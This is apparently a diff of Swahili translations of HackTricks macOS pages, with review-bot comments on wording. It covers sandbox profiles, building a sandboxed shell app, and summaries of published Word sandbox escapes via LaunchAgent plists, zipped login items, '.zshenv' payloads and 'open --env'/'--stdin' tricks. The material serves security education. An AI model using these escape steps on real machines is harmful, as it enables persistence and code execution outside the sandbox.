{% code title="touch.sb" %}
```plaintext
(version 1)
(deny default)
(allow file-read-metadata)
(allow file-write-metadata)
(allow file-read-data (literal "/path/to/file"))
(allow file-write-data (literal "/path/to/file"))
```
This is a simple example of a sandbox profile for the `touch` command. It allows the command to read and write metadata and data for a specific file located at `/path/to/file`. All other operations are denied by default.
```scheme
(version 1)
(deny default)
@ -203,6 +195,8 @@ log show --style syslog --predicate 'eventMessage contains[c] "sandbox"' --last
; 2023-05-26 13:44:59.840050+0200 localhost kernel[0]: (Sandbox) Sandbox: touch(41575) deny(1) sysctl-read kern.bootargs
; 2023-05-26 13:44:59.840061+0200 localhost kernel[0]: (Sandbox) Sandbox: touch(41575) deny(1) file-read-data /
```
{% endcode %}
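Review bot: the replaced hint line mixes languages mid-sentence: `Check this [**research**](…) **ili kuangalia vitendo zaidi …**` opens in English and finishes in Swahili; either keep the old `Angalia` opening or translate the whole sentence. `Mifumo muhimu ya **huduma**` changes the meaning of the old `Huduma muhimu za mfumo` ('important system services') to 'important systems of service', and `profiles za sandbox` is a hybrid where `Profaili za Sandbox` is already used in the heading above. The `/System/Library/Sandbox/Profiles` bullet carries a trailing `&#x20;` entity that should be dropped. Removing the duplicated `plaintext` copy of `touch.sb` and the stray English paragraph `This is a simple example of a sandbox profile for the touch command…` is correct, but confirm that `{% tabs %}` and `{% tab title="touch" %}` survive the change, because `{% endtabs %}` is still present further down the file.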
{% code title="touch3.sb" %}
```scheme
(version 1)
@ -217,10 +211,10 @@ log show --style syslog --predicate 'eventMessage contains[c] "sandbox"' --last
{% endtabs %}
{% hint style="info" %}
Tafadhali kumbuka kuwa **programu** iliyoundwa na **Apple** inayofanya kazi kwenye **Windows** **haina tahadhari za ziada za usalama**, kama vile sandboxing ya programu.
Kumbuka kwamba **programu** **iliyoundwa na Apple** inayofanya kazi kwenye **Windows** **haina tahadhari za ziada za usalama**, kama vile sandboxing ya programu.
{% endhint %}
Mifano ya kuvuka:
Mifano ya kupita:
* [https://lapcatsoftware.com/articles/sandbox-escape.html](https://lapcatsoftware.com/articles/sandbox-escape.html)
* [https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c](https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c) (wanaweza kuandika faili nje ya sandbox ambayo jina lake linaanza na `~$`).
@ -229,38 +223,38 @@ Mifano ya kuvuka:
macOS inahifadhi profaili za sandbox za mfumo katika maeneo mawili: **/usr/share/sandbox/** na **/System/Library/Sandbox/Profiles**.
Na ikiwa programu ya mtu wa tatu ina kibali cha _**com.apple.security.app-sandbox**_, mfumo unatumia profaili ya **/System/Library/Sandbox/Profiles/application.sb** kwa mchakato huo.
Na ikiwa programu ya upande wa tatu ina _**com.apple.security.app-sandbox**_ haki, mfumo unatumia profaili ya **/System/Library/Sandbox/Profiles/application.sb** kwa mchakato huo.
### **Profaili ya Sandbox ya iOS**
Profaili ya chaguo-msingi inaitwa **container** na hatuna uwakilishi wa maandishi wa SBPL. Kumbukumbu, sandbox hii inawakilishwa kama mti wa kibinari wa Ruhusu/Kataa kwa kila idhini kutoka kwenye sandbox.
Profaili ya chaguo-msingi inaitwa **container** na hatuna uwakilishi wa maandiko ya SBPL. Katika kumbukumbu, sandbox hii inawakilishwa kama mti wa binary wa Ruhusu/Kataa kwa kila ruhusa kutoka kwenye sandbox.
### Kuchunguza na Kuvuka Sandbox
### Debug & Bypass Sandbox
Kwenye macOS, tofauti na iOS ambapo michakato inawekwa kwenye sandbox tangu mwanzo na kernel, **michakato lazima ijiunge na sandbox yenyewe**. Hii inamaanisha kuwa kwenye macOS, mchakato hauna kizuizi cha sandbox mpaka uamue kuingia ndani yake.
Katika macOS, tofauti na iOS ambapo michakato inasandboxed tangu mwanzo na kernel, **michakato lazima ijitolee kwenye sandbox yenyewe**. Hii inamaanisha katika macOS, mchakato haujawekewa vizuizi na sandbox hadi uamuzi wa kuingia ndani yake ufanyike.
Michakato inawekwa kwenye Sandbox kiotomatiki kutoka kwa userland wanapoanza ikiwa wana kibali: `com.apple.security.app-sandbox`. Kwa maelezo zaidi juu ya mchakato huu angalia:
Michakato inasandboxed kiotomatiki kutoka kwa userland wanapoanza ikiwa wana haki: `com.apple.security.app-sandbox`. Kwa maelezo ya kina kuhusu mchakato huu angalia:
{% content-ref url="macos-sandbox-debug-and-bypass/" %}
[macos-sandbox-debug-and-bypass](macos-sandbox-debug-and-bypass/)
{% endcontent-ref %}
### **Angalia Uwezo wa PID**
### **Angalia Haki za PID**
[**Kulingana na hii**](https://www.youtube.com/watch?v=mG715HcDgO8\&t=3011s), **`sandbox_check`** (ni `__mac_syscall`), inaweza kuangalia **kama operesheni inaruhusiwa au la** na sandbox katika PID fulani.
[**Zana ya sbtool**](http://newosxbook.com/src.jl?tree=listings\&file=sbtool.c) inaweza kuangalia ikiwa PID inaweza kutekeleza hatua fulani:
[**chombo sbtool**](http://newosxbook.com/src.jl?tree=listings\&file=sbtool.c) kinaweza kuangalia ikiwa PID inaweza kufanya kitendo fulani:
```bash
sbtool <pid> mach #Check mac-ports (got from launchd with an api)
sbtool <pid> file /tmp #Check file access
sbtool <pid> inspect #Gives you an explaination of the sandbox profile
sbtool <pid> all
```
### SBPL ya kawaida katika programu za Duka la App
### Custom SBPL in App Store apps
Inawezekana kwa makampuni kuunda programu zao zifanye kazi **na maelezo ya SBPL ya kawaida** (badala ya ile ya msingi). Wanahitaji kutumia ruhusa ya **`com.apple.security.temporary-exception.sbpl`** ambayo inahitaji idhini kutoka kwa Apple.
Inawezekana kwa kampuni kufanya programu zao zifanye kazi **na wasifu wa Sandbox wa kawaida** (badala ya ule wa kawaida). Wanahitaji kutumia haki **`com.apple.security.temporary-exception.sbpl`** ambayo inahitaji kuidhinishwa na Apple.
Inawezekana kuangalia ufafanuzi wa ruhusa hii katika **`/System/Library/Sandbox/Profiles/application.sb:`**
Inawezekana kuangalia ufafanuzi wa haki hii katika **`/System/Library/Sandbox/Profiles/application.sb:`**
```scheme
(sandbox-array-entitlement
"com.apple.security.temporary-exception.sbpl"
@ -268,18 +262,19 @@ Inawezekana kuangalia ufafanuzi wa ruhusa hii katika **`/System/Library/Sandbox/
(let* ((port (open-input-string string)) (sbpl (read port)))
(with-transparent-redirection (eval sbpl)))))
```
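Review bot: two section headings in this region are left in English, `### Debug & Bypass Sandbox` and `### Custom SBPL in App Store apps`, while the neighbouring headings were translated (`### Profaili ya Sandbox ya iOS`, `### Angalia Haki za PID`); translate them or keep all headings in one language. `michakato inasandboxed` and `Michakato inasandboxed kiotomatiki` are English/Swahili hybrids; the previous `inawekwa kwenye sandbox` is plain Swahili and should be kept. `ina _com.apple.security.app-sandbox_ haki` keeps English word order; in Swahili the noun comes first: `ina haki ya _com.apple.security.app-sandbox_`. While here, the unchanged `sbtool` comment `#Gives you an explaination` has a typo (`explanation`).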
Hii ita **eval string baada ya haki ya kumiliki** kama profile ya Sandbox.
Hii itafanya **eval string baada ya haki hii** kama profaili ya Sandbox.
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
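Review bot: the footer of this file now disagrees with its header. The banner at the top of the file was rewritten in English (`Learn & practice AWS Hacking`, `Check the subscription plans`, `Join the`, `Share hacking tricks`), whereas the footer here is in Swahili (`Jifunze na fanya mazoezi ya AWS Hacking`, `Angalia mpango wa usajili`, `Jiunge na`, `Shiriki mbinu za hacking`); pick one wording and use it for both blocks. Also `tufuatilie` means 'keep track of us'; the old `tufuate` ('follow us') is the right verb for the Twitter link.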

View file

@ -1,22 +1,23 @@
# Uchunguzi wa Sanduku la Kimsingi la macOS
# macOS Default Sandbox Debug
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
Kwenye ukurasa huu unaweza kupata jinsi ya kuunda programu ya kuzindua amri za aina yoyote kutoka ndani ya sanduku la kimsingi la macOS:
Katika ukurasa huu unaweza kupata jinsi ya kuunda programu ya kuzindua amri za kawaida kutoka ndani ya sanduku la kawaida la macOS:
1. Sakinisha programu:
1. Jenga programu:
{% code title="main.m" %}
```objectivec
@ -50,9 +51,9 @@ return 0;
```
{% endcode %}
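Review bot: the intro sentence weakens the claim of the page: `kuzindua amri za kawaida` says 'launch ordinary commands', whereas the removed `amri za aina yoyote` ('commands of any kind') is what a `SandboxedShellApp` that runs a shell from inside the default sandbox is meant to demonstrate; keep `amri za aina yoyote` or use `amri zozote`. Changing step 1 from `Sakinisha programu` ('install') to `Jenga programu` ('build') is right, since the step is the `clang -framework Foundation -o SandboxedShellApp main.m` build.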
Jenga kwa kukimbia: `clang -framework Foundation -o SandboxedShellApp main.m`
Ili kuijenga, tumia: `clang -framework Foundation -o SandboxedShellApp main.m`
2. Jenga mfuko wa `.app`
2. Jenga kifurushi cha `.app`
```bash
mkdir -p SandboxedShellApp.app/Contents/MacOS
mv SandboxedShellApp SandboxedShellApp.app/Contents/MacOS/
@ -74,7 +75,7 @@ cat << EOF > SandboxedShellApp.app/Contents/Info.plist
</plist>
EOF
```
3. Taja haki za kibali
3. Tafsiri haki
{% tabs %}
{% tab title="sandbox" %}
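Review bot: step 3 is now mistranslated: `Tafsiri haki` means 'translate the entitlements', while the step writes an `entitlements.plist` (the `cat << EOF > entitlements.plist` block in the tabs that follow), so it should say 'define' or 'specify', e.g. `Bainisha haki` or the replaced `Taja haki`.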
@ -92,7 +93,7 @@ EOF
```
{% endtab %}
{% tab title="sandbox + downloads" %}sandbox + kupakua{% endtab %}
{% tab title="sandbox + downloads" %}
```bash
cat << EOF > entitlements.plist
<?xml version="1.0" encoding="UTF-8"?>
@ -110,7 +111,7 @@ EOF
{% endtab %}
{% endtabs %}
4. Saini programu (unahitaji kuunda cheti katika keychain)
4. Saini programu (unahitaji kuunda cheti katika ufunguo)
```bash
codesign --entitlements entitlements.plist -s "YourIdentity" SandboxedShellApp.app
./SandboxedShellApp.app/Contents/MacOS/SandboxedShellApp
@ -118,16 +119,17 @@ codesign --entitlements entitlements.plist -s "YourIdentity" SandboxedShellApp.a
# An d in case you need this in the future
codesign --remove-signature SandboxedShellApp.app
```
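Review bot: `cheti katika ufunguo` ('a certificate in the key') mistranslates `keychain`, which is the name of the macOS store and was correctly kept untranslated in the replaced line (`cheti katika keychain`); restore the loanword. While here, the unchanged comment `# An d in case you need this in the future` has a stray space (`And`).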
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

View file

@ -1,66 +1,63 @@
# Kuepuka Sanduku la Mchanga la macOS Office
# macOS Office Sandbox Bypasses
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
### Kuepuka Sanduku kwa Neno kwa Kutumia Mawakala wa Kuanzisha
### Word Sandbox bypass via Launch Agents
Programu hutumia **Sanduku la Mchanga la desturi** kwa kutumia ruhusu **`com.apple.security.temporary-exception.sbpl`** na sanduku hili la desturi linaruhusu kuandika faili popote ikiwa jina la faili linaanza na `~$`: `(hitaji-moja-kwa-moja (hitaji-yote (aina-ya-vnode REGULAR-FILE) (regex #"(^|/)~$[^/]+$")))`
Programu inatumia **Sandbox maalum** kwa kutumia haki **`com.apple.security.temporary-exception.sbpl`** na sandbox hii maalum inaruhusu kuandika faili popote mradi jina la faili linapoanza na `~$`: `(require-any (require-all (vnode-type REGULAR-FILE) (regex #"(^|/)~$[^/]+$")))`
Kwa hivyo, kuepuka kulikuwa rahisi kama **kuandika `plist`** ya LaunchAgent katika `~/Library/LaunchAgents/~$escape.plist`.
Hivyo, kutoroka ilikuwa rahisi kama **kuandika `plist`** LaunchAgent katika `~/Library/LaunchAgents/~$escape.plist`.
Angalia [**ripoti ya asili hapa**](https://www.mdsec.co.uk/2018/08/escaping-the-sandbox-microsoft-office-on-macos/).
Check the [**original report here**](https://www.mdsec.co.uk/2018/08/escaping-the-sandbox-microsoft-office-on-macos/).
### Kuepuka Sanduku kwa Neno kwa Kutumia Vitu vya Kuingia na zip
### Word Sandbox bypass via Login Items and zip
Kumbuka kwamba kutoka kwa kuepuka kwanza, Neno linaweza kuandika faili za aina yoyote ambazo jina lake linaanza na `~$` ingawa baada ya kurekebisha kasoro ya awali haikuwezekana kuandika katika `/Library/Application Scripts` au katika `/Library/LaunchAgents`.
Kumbuka kwamba kutoka kutoroka kwa kwanza, Word inaweza kuandika faili zisizo na mpangilio ambazo jina lake linaanza na `~$` ingawa baada ya patch ya udhaifu wa awali haikuwezekana kuandika katika `/Library/Application Scripts` au katika `/Library/LaunchAgents`.
Iligunduliwa kwamba kutoka ndani ya sanduku la mchanga ni **inawezekana kuunda Kipengele cha Kuingia** (programu ambazo zitatekelezwa wakati mtumiaji anajiingia). Walakini, programu hizi **hazitafanya kazi isipokuwa** zime **sainiwa** na **haiwezekani kuongeza args** (kwa hivyo huwezi tu kukimbia kitanzi cha nyuma kwa kutumia **`bash`**).
Iligundulika kwamba kutoka ndani ya sandbox inawezekana kuunda **Kitu cha Kuingia** (programu ambazo zitatekelezwa wakati mtumiaji anapoingia). Hata hivyo, programu hizi **hazitaweza kutekelezwa isipokuwa** hazijakuwa **notarized** na **haiwezekani kuongeza args** (hivyo huwezi tu kuendesha shell ya kinyume kwa kutumia **`bash`**).
Kutoka kwa kuepuka kwa sanduku la mchanga hapo awali, Microsoft ilizima chaguo la kuandika faili katika `~/Library/LaunchAgents`. Walakini, iligunduliwa kwamba ikiweka **faili ya zip kama Kipengele cha Kuingia** `Archive Utility` itaifungua tu katika eneo lake la sasa. Kwa hivyo, kwa sababu kwa chaguo-msingi saraka ya `LaunchAgents` kutoka `~/Library` haijaundwa, ilikuwa inawezekana **kuzipisha plist katika `LaunchAgents/~$escape.plist`** na **kuweka** faili ya zip katika **`~/Library`** ili wakati wa kuzipua itafikia marudio ya uthabiti.
Kutoka kwa kutoroka kwa Sandbox ya awali, Microsoft ilizima chaguo la kuandika faili katika `~/Library/LaunchAgents`. Hata hivyo, iligundulika kwamba ikiwa utaweka **faili ya zip kama Kitu cha Kuingia** `Archive Utility` itachambua tu **zip** katika eneo lake la sasa. Hivyo, kwa sababu kwa kawaida folda `LaunchAgents` kutoka `~/Library` haijaundwa, ilikuwa inawezekana **kuzipa plist katika `LaunchAgents/~$escape.plist`** na **kuiweka** faili ya zip katika **`~/Library`** ili wakati wa kufungua itafikia mahali pa kudumu.
Angalia [**ripoti ya asili hapa**](https://objective-see.org/blog/blog\_0x4B.html).
Check the [**original report here**](https://objective-see.org/blog/blog\_0x4B.html).
### Kuepuka Sanduku kwa Neno kwa Kutumia Vitu vya Kuingia na .zshenv
### Word Sandbox bypass via Login Items and .zshenv
(Kumbuka kwamba kutoka kwa kuepuka kwanza, Neno linaweza kuandika faili za aina yoyote ambazo jina lake linaanza na `~$`).
(Kumbuka kwamba kutoka kutoroka kwa kwanza, Word inaweza kuandika faili zisizo na mpangilio ambazo jina lake linaanza na `~$`).
Walakini, mbinu ya awali ilikuwa na kizuizi, ikiwa saraka ya **`~/Library/LaunchAgents`** ipo kwa sababu programu nyingine iliiunda, itashindwa. Kwa hivyo, mlolongo tofauti wa Vitu vya Kuingia uligunduliwa kwa hii.
Hata hivyo, mbinu ya awali ilikuwa na kikomo, ikiwa folda **`~/Library/LaunchAgents`** ipo kwa sababu programu nyingine iliiunda, ingekuwa na shida. Hivyo, mnyororo tofauti wa Kitu cha Kuingia uligundulika kwa hili.
Mshambuliaji angeweza kuunda faili za **`.bash_profile`** na **`.zshenv`** na mzigo wa kutekeleza kisha kuzipisha na **kuandika zip katika saraka ya mtumiaji wa waathirika**: **`~/~$escape.zip`**.
Mshambuliaji angeweza kuunda faili **`.bash_profile`** na **`.zshenv`** zikiwa na payload ya kutekeleza na kisha kuzipa na **kuandika zip katika** folda ya mtumiaji wa wahanga: **`~/~$escape.zip`**.
Kisha, ongeza faili ya zip kwa **Vitu vya Kuingia** na kisha programu ya **`Terminal`**. Wakati mtumiaji anapoingia tena, faili ya zip itafunguliwa katika faili za mtumiaji, ikibadilisha **`.bash_profile`** na **`.zshenv`** na kwa hivyo, terminal itatekeleza moja ya faili hizi (kulingana na ikiwa bash au zsh inatumika).
Kisha, ongeza faili ya zip kwenye **Kitu cha Kuingia** na kisha programu ya **`Terminal`**. Wakati mtumiaji anapoingia tena, faili ya zip itafunguliwa katika faili za watumiaji, ikipunguza **`.bash_profile`** na **`.zshenv`** na hivyo, terminal itatekeleza moja ya faili hizi (kulingana na ikiwa bash au zsh inatumika).
Angalia [**ripoti ya asili hapa**](https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c).
Check the [**original report here**](https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c).
### Kuepuka Sanduku la Mchanga kwa Neno kwa Kutumia Open na mazingira ya env
### Word Sandbox Bypass with Open and env variables
Kutoka kwa michakato iliyowekwa sandukuni, bado inawezekana kuamsha michakato mingine kwa kutumia zana ya **`open`**. Zaidi ya hayo, michakato hii itaendeshwa **ndani ya sanduku yao wenyewe la mchanga**.
Kutoka kwa michakato ya sandboxed bado inawezekana kuita michakato mingine kwa kutumia **`open`** utility. Zaidi ya hayo, michakato hii itakimbia **ndani ya sandbox yao wenyewe**.
Iligunduliwa kwamba zana ya open ina chaguo la **`--env`** kuendesha programu na **mazingira maalum** ya env. Kwa hivyo, ilikuwa inawezekana kuunda faili ya **`.zshenv`** ndani ya saraka **ndani** ya **sanduku la mchanga** na kutumia `open` na `--env` kuweka **mazingira ya `HOME`** kwa saraka hiyo ikifungua programu ya `Terminal`, ambayo itatekeleza faili ya `.zshenv` (kwa sababu fulani pia ilikuwa ni lazima kuweka variable `__OSINSTALL_ENVIROMENT`).
Iligundulika kwamba utility ya open ina chaguo la **`--env`** kuendesha programu na **mabadiliko maalum**. Hivyo, ilikuwa inawezekana kuunda **faili ya `.zshenv`** ndani ya folda **ndani** ya **sandbox** na kutumia `open` na `--env` kuweka **`HOME` variable** kwa folda hiyo ikifungua programu hiyo ya `Terminal`, ambayo itatekeleza faili ya `.zshenv` (kwa sababu fulani ilikuwa pia inahitajika kuweka mabadiliko `__OSINSTALL_ENVIROMENT`).
Angalia [**ripoti ya asili hapa**](https://perception-point.io/blog/technical-analysis-of-cve-2021-30864/).
Check the [**original report here**](https://perception-point.io/blog/technical-analysis-of-cve-2021-30864/).
### Kuepuka Sanduku la Mchanga kwa Neno kwa Kutumia Open na stdin
### Word Sandbox Bypass with Open and stdin
Zana ya **`open`** pia ilisaidia paramu ya **`--stdin`** (na baada ya kuepuka hapo awali haikuwezekana tena kutumia `--env`).
Utility ya **`open`** pia ilisaidia param ya **`--stdin`** (na baada ya kutoroka kwa awali haikuwezekana tena kutumia `--env`).
Jambo ni kwamba hata ikiwa **`python`** ilisainiwa na Apple, **haitatekeleza** skripti na sifa ya **`karantini`**. Walakini, ilikuwa inawezekana kuipitisha skripti kutoka kwa stdin ili isichunguze ikiwa ilikuwa imekarantiniwa au la:&#x20;
Jambo ni kwamba hata kama **`python`** ilitiwa saini na Apple, **haitatekeleza** script yenye sifa ya **`quarantine`**. Hata hivyo, ilikuwa inawezekana kupitisha script kutoka stdin hivyo haitakagua ikiwa ilikuwa imewekwa karantini au la:&#x20;
1. Weka faili ya **`~$exploit.py`** na amri za Python za hiari.
2. Chalua _open_ **`stdin='~$exploit.py' -a Python`**, ambayo inatekeleza programu ya Python na faili yetu iliyowekwa kama kuingia kawaida. Python inatekeleza kwa furaha nambari yetu, na kwa kuwa ni mchakato wa mtoto wa _launchd_, haifungwi na sheria za sanduku la mchanga la Neno.
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
1. Angusha faili **`~$exploit.py`** yenye amri za Python zisizo na mpangilio.
2. Kimbia _open_ **`stdin='~$exploit.py' -a Python`**, ambayo inakimbia programu ya Python na faili yetu iliyotupwa ikihudumu kama ingizo lake la kawaida. Python kwa furaha inakimbia msimbo wetu, na kwa kuwa ni mchakato wa mtoto wa _launchd_, haifungwi na sheria za sandbox za Word.
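Review bot: The `open` invocation in step 2, `stdin='~$exploit.py' -a Python`, drops the leading dashes of the `--stdin` parameter that the paragraph above names, so the command as written does not match the flag it describes; it should read `--stdin`. Two lines in this hunk also regress from Swahili to English while the surrounding text stays Swahili: the heading `### Word Sandbox Bypass with Open and stdin` and `Check the original report here`, both of which the old version had translated. The variable name `__OSINSTALL_ENVIROMENT` is carried over unchanged; since it looks like a misspelling, worth verifying the exact name against the linked Perception Point report before merging.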

View file

@ -1,54 +1,56 @@
# Skripti za Apple kwenye macOS
# macOS Apple Scripts
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
